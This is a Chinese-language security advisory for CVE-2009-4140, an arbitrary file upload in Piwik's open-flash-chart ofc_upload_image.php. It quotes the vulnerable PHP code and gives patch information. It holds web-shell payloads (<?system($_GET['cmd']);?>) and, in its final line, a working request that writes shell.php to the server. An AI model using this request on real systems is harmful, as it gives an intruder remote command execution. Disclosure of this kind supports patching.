BUGTRAQ ID: 37314
CVE(CAN) ID: CVE-2009-4140
Piwik是一款利用Php+MySQL技术构建的开源网页访问统计系统。
Piwik中使用了open-flash-chart模块执行制表操作,该模块没有正确的过滤提交给ofc_upload_image.php文件的name和HTTP_RAW_POST_DATA参数便用于创建文件:
<?
$default_path = ‘…/tmp-upload-images/’;
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
$destination = $default_path . basename( $_GET[ ‘name’ ] ); // This should be sanitised before use.
echo 'Saving your image to: '. $destination; // and it tells us where it's saving it to, sigh.
$jfh = fopen($destination, 'w') or die("can't open file"); // The vulnerable code is right here.
fwrite($jfh, $HTTP_RAW_POST_DATA); // and here, <?phpinfo();?>, <?system($_GET['cmd']);?>
fclose($jfh);
?>
在启用了register_globals的情况下,通过认证的远程攻击者可以通过上传带有PHP扩展名的文件并通过直接请求tmp-upload-images/来访问该文件导致执行任意代码。
Piwik 0.2.35 - 0.4.3
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/
./libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>